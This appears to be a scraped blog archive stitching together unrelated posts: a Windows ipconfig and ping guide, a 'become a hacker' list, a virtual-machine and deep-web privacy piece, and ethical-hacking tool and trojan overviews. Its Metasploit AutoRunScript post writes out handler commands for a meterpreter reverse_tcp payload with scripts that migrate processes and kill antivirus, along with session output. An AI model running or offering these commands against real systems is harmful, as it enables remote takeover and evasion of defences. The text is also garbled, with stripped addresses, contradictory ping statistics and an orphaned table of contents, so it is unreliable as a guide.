
Saturday 29 July 2017


Windows users, here is how I can find my IP address. First, click the Start Menu, and select Run. Next, type ”cmd” into the box and click the ”OK” button. Finally, at the prompt, type ”ipconfig” or “ping” and information about your IP Address will be displayed. STEP:1:- Open the command prompt. Press ⊞ Win+R and type cmd into the field. Press ↵ Enter to open the Command Prompt.In Windows 8, you can press ⊞ Win+X and select the Command Prompt from the menu.

STEP 2:- Run the “ipconfig” tool. Type ipconfig and press ↵ Enter. This will display a list of your network connection information. All of the network connections on your computer will be displayed.

STEP 3:- Find your IP Address. Your active connection may be labeled Wireless Network Connection, Ethernet adapter, or Local Area Connection Mac Address. It may also be labeled by the manufacturer of your network adapter. Find your active connection and look for IPv4 Address

Ping a Website/IP Address in CMD

Run the ping command. Type “ping,” then a single space and then the name of any website or IP address. It is not necessary to include “http://” at the beginning of the address, but you should include the “www” portion of the address. A good ping command should read as follows:
Example:-  ping

Pinging [] with 32 bytes of data:
Reply from bytes=32 time=472ms TTL=54
Reply from bytes=32 time=412ms TTL=54
Reply from bytes=32 time=362ms TTL=54
Reply from bytes=32 time=332ms TTL=54
Ping statistics for
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 332ms, Maximum = 41ms, Average = 394ms
output is the “ping statistics” section at the bottom. A standard Windows ping command sends out four packets of information. The statistics tell you how many of the packets were received by the server or site you are pinging, and the percentage of packet loss the command registered.
Ideally, for a healthy Internet connection, you want to see four packets sent, four packets received, and 0% packet loss.


Hacking is surely not easy. To become a hacker one has to have an attitude and curiosity of learning and adapting new skills. You must have a deep knowledge of computer systems, programming languages, operating systems and the journey of learning goes on and on. Some people think that a hacker is always a criminal and do illegal activities but they are wrong.

We have prepared a list of 10 most important step’s necessary to become a hacker.

Step 1:- Computer networking

You need to know the differences between different types of networks and must have a clear understanding of TCP/IP and UDP to exploit vulnerabilities (loop holes) in system.
Understanding what LAN, WAN, VPN, Firewall is also important.
You must have a clear understanding and use of network tools such as Wireshark, NMAP for packet analyzing, network scanning etc.
Step 2:-Cryptography encryption

To become a successful hacker you need to master the art of cryptography. Encryption and Decryption are important skills in hacking. Encryption is widely done in several aspects of information system security in authentication, confidentiality and integrity of data. Information on a network is in encrypted form such as passwords. While hacking a system, these encrypted codes needs to be broken, which is called decryption.
Step 3:-Hackers

Go through various tutorials, eBooks written by experts in the field of hacking. In the field of hacking, learning is never ending because security changes every day with new updates in systems.
Step 4:-Hacking Experiment

After learning some concepts, sit and practice them. Setup your own lab for experimental purpose. You need a good computer system to start with as some tools may require powerful processor, RAM etc. Keep on Testing and learning until you breach a system.
Step 5:-Learning hacking

Learning is the key to success in the world of hacking. Continuous learning and practicing will make you the best hacker. Keep yourself updated about security changes and learn about new ways to exploit systems.
Step 6:-Programming languages

It is important for a person in the hacking field to learn more than one programming. There are many programming languages to learn such as Python, JAVA, C++. Free eBooks, tutorials are easily available online.
Step 7:-Hacking Linux

LINUX is an open source operating system which provides better security to computer systems. It was first developed by AT&T in Bell labs and contributed a lot in the world of security. You should install LINUX freely available open source versions on your desktops as without learning LINUX, it is not possible to become a hacker.
Step 8:-C Programming

C programming is the base of learning UNIX/LINUX as this operating system is coded in C programming which makes it the most powerful language as compared to other programming languages. C language was developed by Dennis Ritchie in late 1970’s. To become a hacker you should master C language.
Step 9:-Operating System

It is essential for a hacker to learn more than one operating system. There are many other Operating systems apart from Windows, UNIX/LINUX etc. Every system has a loop hole, hacker needs it to exploit it.
Step 10:-Vulnerability

Vulnerability is the weakness, loop hole or open door through which you enter the system. Look for vulnerabilities by scanning the system, network etc. Try to write your own and exploit the system.

Virtual Machines

What Is a Virtual Machine?
Virtual machine word cloud concept on grey background
When you want to use your new operating system, you just need to open the virtual machine program and run it in a window on your desktop
A virtual machine is a program which creates a virtual computer system along with its virtual hardware devices.
This means that a separate operating system is running in a window on the desktop of your computer.
You can install and run it by booting the installer disc inside the virtual machines.
This is how you actually ‘trick’ it into thinking that it is running on a separate computer machine.
When you want to use your new operating system, you just need to open the virtual machine program and run it in a window on your desktop.
Since everything we’ve discussed so far is virtual, of course, that your new operating system is stored on a virtual hard drive.
The file is going to be gigantic; you will need some multi-gigabyte space on the hard disc.
The good thing is that you will not have to do anything with partitioning since this file is presented as a real hard drive to the operating system.
Why Are Virtual Machines Useful?
There are many advantages to using virtual machines on your computers, and below are presented some of them:
  • First and foremost, they allow you to experiment with the other operating system without having to leave or remove your current one.
  • They enable you to test the newest versions of operating systems, such as Windows or Mac.
  • You are given the possibility to run software belonging to another operating system. For example, if you are using Linux as your primary operating system, you will be able to install Windows in a virtual machine and run some Windows programs inside the virtual machine, or vice versa.
  • These programs are very efficient and easy to work with. You can look at it as if you are opening a new application. There is no time consuming while formatting hard disks and various switching.
  • Virtual machines are “sandboxed.” To put it simply, they are put away from the rest of your computer. The software is placed inside the virtual machine and cannot escape it nor can it interfere or damage it. It is also great if there are some programs that you don’t trust. So, just place them inside your virtual machine and see what they can do. This so-called ‘sandboxing’ can also allow you to run the insecure operating systems in a safer way.
  • The last but not the least, virtual machines are great protectors for safe deep web browsing. We all know that it is almost impossible to stay completely secure and undercover on the Internet, but these little things are very helpful, though. Even if someone manages to get through your VPN, they won’t be able to find out anything about the machine you are using.
What Are The Best Virtual Machines?
Although there is a great number of virtual machines, as always, there is also a small number of those which are considered as the best ones.
By researching and reading through readers’ comments and reviews, the conclusion has been drawn that the following ones are the most respectable ones.
1. VirtualBox
Hand holding virtual box
It has many features that can be found in VirtualBox, but if you want more advanced ones, you will have to pay to get them through the VMware Workstation.
VirtualBox is probably the most popular virtual machine. Now, this comes for a number of reasons; the most important ones being that it is completely free and available for Windows, Mac and, Linux operating systems.
Despite the fact that it doesn’t belong to the fastest virtual machines, it compensates this drawback by working perfectly and flawlessly on Windows and Linux operating systems.
It has got some amazing features that make it powerful than it may seem at first glance.
VirtualBox requires a newer Intel or AMD processor and is available on all major platforms.
To make navigation easier, it features plain text HML files.
No matter what platform it is installed on, it works perfectly. You can download and install it as a regular application, and it would be the best if you could use your VirtualBox on a Linux system, for the sake of security.
It offers many features to the users.
Among others, you can use laudable hardware support, multi-screen resolutions and 3D visualization.
It also comes with special software packages which are designed to provide additional help for those with sharing folders and drives among guest and host operating systems.
In combination with Tor Browser, there are chances for you to become almost invisible on the Deep Web.
If you are a first-time user and not sure how to install or use it, there a plenty of instruction manuals you can refer to.
2. VMware
the logo of the brand "VMware".
VMware Player is downloadable for free, as has already been said.
VMware has its own line of virtual machine programs; VMware Player, VMware Fusion and, VMware Workstation.
Of all these, only VMware Player is available for free.
If you want Workstation, you will have to pay $250 for it, while VMware Fusion can be purchased for $80.
All of these work on any operating system, Windows, Linux or Mac.
VMware Player is downloadable for free, as has already been said.
It has many features that can be found in VirtualBox, but if you want more advanced ones, you will have to pay to get them through the VMware Workstation.
It is designed for the professional users who want to have a machine that can run various applications on multiple guest operating systems at the same time.
Finally, there is VMware Fusion.
This is an application for users who wish to run a Windows system on their Mac. However, its applications and options are not that easy to use.
But, you can install it really fast and see that it ingrates between operating systems quite logically.
Most of the users agree that VMware virtual machines are most stable and the most reliable ones.
3. Parallels Desktop
For those of you average users, Parallels Desktop is probably the best one at the moment.
This virtual machine is available for Mac users only. Unlike VirtualBox, which is available for free, you will have to pay $80 to get Parallels Desktop.
Parallels Desktop is intended for the average Mac users who want to have Windows operating system on their computers.
It can also emulate the Linux and Solaris operating systems, but the tightest integration is between Mac and Windows.
If you combine it with VMWare Fusion, you will get one great experience.
Parallels Desktop virtual machine allows you to emulate Windows HP, Windows 7, 8 or 10 as a guest operating system since it is now compatible with OS X El Capitan.
There is no rebooting; you can run both Mac and Windows applications simultaneously. You are also provided with the tools for moving your files from one operating system to another really fast.
When it comes to the features you can get, there is advanced 3D graphics, support for the Retina displays and a very easy and simple setup wizard.
However, if you would like some more advanced ones, you will have to look for them within some other virtual machine.
For those of you average users, Parallels Desktop is probably the best one at the moment.
QEMU executes the guest code directly on the host machine and can emulate hardware with dynamic translation.
QEMU virtual machine, or Quick EMUlator, is available for Linux users only, and it they can get it for free.
It is built upon the KVM system (Kernel-based Virtual Machine), and it can emulate a wide range of hardware and software type through a process which involves dynamic binary translation.
Moreover, it does not require admin access to run guest operating systems.
QEMU executes the guest code directly on the host machine and can emulate hardware with dynamic translation.
It also provides you with auto-resizing virtual disks. Moreover, it is one of the most regularly updated virtual machines thanks to its open source nature.
With so many advantages of these pretty little toys, one may start wondering are there any cons at all?
Unfortunately, there are. When you run many virtual machines on a host computer at the same time, each of them may become unstable at any time.
It depends on the system workload by other running virtual machines.
This is not so unexpected when you think about it a bit harder.
Furthermore, a virtual machine is not as efficient as a real one when accessing the hardware.
Additionally, some virtualization programs do not feature USB ports in virtual machines, or in other words, you cannot access USB or serial devices physically plugged into a host machine on virtual server.
So, whatever your purpose is for using virtual machines, remember that staying completely anonymous and secure on the Internet is almost impossible.
You don’t have to be a drug dealer or any other cyber criminal for wanting to be invisible online.
Whether you want to do it for some personal reasons, for example, if you are a cannabis user for medical treatments in a state which hasn’t approved it yet, or wishing to express your sexual orientation and political views in a conservative society, these virtual machine toys can help you keep your discretion.
However, you can never be too precautious.
You shouldn’t open any of the social network websites or check your emails if you’re browsing the Deep Web from your virtual machines.
It is self-explanatory how these sites could reveal your identity.


The articles and content found on Dark Web News are for general information purposes only and are not intended to solicit illegal activity or constitute legal advice. Using drugs is harmful to your health and can cause serious problems including death and imprisonment, and any treatment should not be undertaken without medical supervision.

Wednesday 26 July 2017

AutoRun Script on Metasploit Framework

In Metasploit it supports an interesting feature called AutoRunScript. This feature can enable users to specify the module operation by creating the .rc file pre-registered automatically during operation Exploit.

It can be shortened for some time on your pentest if we use these features.
How to use AutoRun on metasploit
First, create an .rc file containing the command to run automatically. For example, i created a file named ddos.rc on /root/ direcoty. This file puts the command line to perform automatically at the msf penetration.
# cat /root/ddos.rc
run post/windows/manage/migrate
run post/windows/manage/killav

Now, on metasploit framework, if you choose any exploit module, you need to set AutoRunScript parameter
exploit(handler) #>set LHOST
exploit(handler) #>set LPORT 8080
exploit(handler) #>set PAYLOADS windows/meterpreter/reverse_tcp
exploit(handler) #>set AutoRunScript multi_console_command -rc /root/ddos.rc
If successful, then set Exploit ddos.rc to load the file as shown below and perform the specified command, such as migrate, killav. To maintain substantially the same time penetrate and migrate through the secure shell to keep breathing space in the memory of another process or the process to create a new connection in the target PC, this setting can be a bit easier if you pre-register as a script like this.
exploit(handler) #> exploit
[*] Started reverse handler on
[*] Starting the payload handler…
[*] Sending stage (885806 bytes) to
[*] Meterpreter session 1 opened ( -> at 2016-10-20 20:11:22 +0900
meterpreter >
[*] Session ID 1 ( -> processing AutoRunScript ‘multi_console_command -rc /root/ddos.rc’
[*] Running Command List …
[*] Running command run post/windows/manage/migrate
[*] Running module against BEGINNER-A36957
[*] Current server process: exc.exe (156)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 780
[+] Successfully migrated to process 780
[*] Running command run post/windows/manage/killav
[*] No target processes were found.


Table of contents

Introduction ……………………………………………………………………………………………………………………………….. 3
Lab environment ……………………………………………………………………………………………………………………… 3
Getting the exploit ………………………………………………………………………………………………………………………. 5
Resolving dependencies ……………………………………………………………………………………………………………. 5
Check if the exploit works …………………………………………………………………………………………………………….. 6
Authentication …………………………………………………………………………………………………………………………. 6
Parameters ……………………………………………………………………………………………………………………………… 6
Execution without shellcode ……………………………………………………………………………………………………… 7
Cooking the shellcode ………………………………………………………………………………………………………………….. 8
Creating .SCT file with PS1ENCODE …………………………………………………………………………………………….. 8
Allowing shellcode.sct download ……………………………………………………………………………………………….. 8
Alteration of exploit’s behavior …………………………………………………………………………………………………… 10
Executing the shellcode …………………………………………………………………………………………………………… 10
Getting the Meterpreter session …………………………………………………………………………………………………. 11
Final words… …………………………………………………………………………………………………………………………….. 13


Ethical Hacking - Tools

In this chapter, we will discuss in brief some of famous tools that are widely used to prevent hacking and getting unauthorized access to a computer or network system.


Nmap stands for Network Mapper. It is an open source tool that is used widely for network discovery and security auditing. Nmap was originally designed to scan large networks, but it can work equally well for single hosts. Network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.
Nmap uses raw IP packets to determine −
  • what hosts are available on the network,
  • what services those hosts are offering,
  • what operating systems they are running on,
  • what type of firewalls are in use, and other such characteristics.
Nmap runs on all major computer operating systems such as Windows, Mac OS X, and Linux.


Metasploit is one of the most powerful exploit tools. It’s a product of Rapid7 and most of its resources can be found at: It comes in two versions − commercialand free edition. Matasploit can be used with command prompt or with Web UI.
With Metasploit, you can perform the following operations −
  • Conduct basic penetration tests on small networks
  • Run spot checks on the exploitability of vulnerabilities
  • Discover the network or import scan data
  • Browse exploit modules and run individual exploits on hosts

Burp Suit

Burp Suite is a popular platform that is widely used for performing security testing of web applications. It has various tools that work in collaboration to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.
Burp is easy to use and provides the administrators full control to combine advanced manual techniques with automation for efficient testing. Burp can be easily configured and it contains features to assist even the most experienced testers with their work.

Angry IP Scanner

Angry IP scanner is a lightweight, cross-platform IP address and port scanner. It can scan IP addresses in any range. It can be freely copied and used anywhere. In order to increase the scanning speed, it uses multithreaded approach, wherein a separate scanning thread is created for each scanned IP address.
Angry IP Scanner simply pings each IP address to check if it’s alive, and then, it resolves its hostname, determines the MAC address, scans ports, etc. The amount of gathered data about each host can be saved to TXT, XML, CSV, or IP-Port list files. With help of plugins, Angry IP Scanner can gather any information about scanned IPs.

Cain & Abel

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It helps in easy recovery of various kinds of passwords by employing any of the following methods −
  • sniffing the network,
  • cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks,
  • recording VoIP conversations,
  • decoding scrambled passwords,
  • recovering wireless network keys,
  • revealing password boxes,
  • uncovering cached passwords and analyzing routing protocols.
Cain & Abel is a useful tool for security consultants, professional penetration testers and everyone else who plans to use it for ethical reasons.


Ettercap stands for Ethernet Capture. It is a network security tool for Man-in-the-Middle attacks. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. Ettercap has inbuilt features for network and host analysis. It supports active and passive dissection of many protocols.
You can run Ettercap on all the popular operating systems such as Windows, Linux, and Mac OS X.


EtherPeek is a wonderful tool that simplifies network analysis in a multiprotocol heterogeneous network environment. EtherPeek is a small tool (less than 2 MB) that can be easily installed in a matter of few minutes.
EtherPeek proactively sniffs traffic packets on a network. By default, EtherPeek supports protocols such as AppleTalk, IP, IP Address Resolution Protocol (ARP), NetWare, TCP, UDP, NetBEUI, and NBT packets.


SuperScan is a powerful tool for network administrators to scan TCP ports and resolve hostnames. It has a user friendly interface that you can use to −
  • Perform ping scans and port scans using any IP range.
  • Scan any port range from a built-in list or any given range.
  • View responses from connected hosts.
  • Modify the port list and port descriptions using the built in editor.
  • Merge port lists to build new ones.
  • Connect to any discovered open port.
  • Assign a custom helper application to any port.


QualysGuard is an integrated suite of tools that can be utilized to simplify security operations and lower the cost of compliance. It delivers critical security intelligence on demand and automates the full spectrum of auditing, compliance and protection for IT systems and web applications.
QualysGuard includes a set of tools that can monitor, detect, and protect your global network.


WebInspect is a web application security assessment tool that helps identify known and unknown vulnerabilities within the Web application layer.
It can also help check that a Web server is configured properly, and attempts common web attacks such as parameter injection, cross-site scripting, directory traversal, and more.


LC4 was formerly known as L0phtCrack. It is a password auditing and recovery application. It is used to test password strength and sometimes to recover lost Microsoft Windows passwords, by using dictionary, brute-force, and hybrid attacks.
LC4 recovers Windows user account passwords to streamline migration of users to another authentication system or to access accounts whose passwords are lost.

LANguard Network Security Scanner

LANguard Network Scanner monitors a network by scanning connected machines and providing information about each node. You can obtain information about each individual operating system.
It can also detect registry issues and have a report set up in HTML format. For each computer, you can list the netbios name table, current logged-on user, and Mac address.

Network Stumbler

Network stumbler is a WiFi scanner and monitoring tool for Windows. It allows network professionals to detect WLANs. It is widely used by networking enthusiasts and hackers because it helps you find non-broadcasting wireless networks.
Network Stumbler can be used to verify if a network is well configured, its signal strength or coverage, and detect interference between one or more wireless networks. It can also be used to non-authorized connections.


ToneLoc stands for Tone Locator. It was a popular war dialling computer program written for MS-DOS in the early 90’s. War dialling is a technique of using a modem to automatically scan a list of telephone numbers, usually dialling every number in a local area code.
Malicious hackers use the resulting lists in breaching computer security - for guessing user accounts, or locating modems that might provide an entry-point into computer or other electronic systems.
It can be used by security personnel to detect unauthorized devices on a company’s telephone network.

Ethical Hacking - Trojan Attacks

Trojans are non-replication programs; they don’t reproduce their own codes by attaching themselves to other executable codes. They operate without the permissions or knowledge of the computer users.
Trojans hide themselves in healthy processes. However we should underline that Trojans infect outside machines only with the assistance of a computer user, like clicking a file that comes attached with email from an unknown person, plugging USB without scanning, opening unsafe URLs.
Trojans have several malicious functions −
  • They create backdoors to a system. Hackers can use these backdoors to access a victim system and its files. A hacker can use Trojans to edit and delete the files present on a victim system, or to observe the activities of the victim.
  • Trojans can steal all your financial data like bank accounts, transaction details, PayPal related information, etc. These are called Trojan-Banker.
  • Trojans can use the victim computer to attack other systems using Denial of Services.
  • Trojans can encrypt all your files and the hacker may thereafter demand money to decrypt them. These are Ransomware Trojans.
  • They can use your phones to send SMS to third parties. These are called SMS Trojans.

Trojan Information

If you have found a virus and want to investigate further regarding its function, then we will recommend that you have a look at the following virus databases, which are offered generally by antivirus vendors.

Quick Tips

  • Install a good antivirus and keep it updated.
  • Don’t open email attachments coming from unknown sources.
  • Don’t accept invitation from unknown people in social media.
  • Don’t open URLs sent by unknown people or URLs that are in weird form.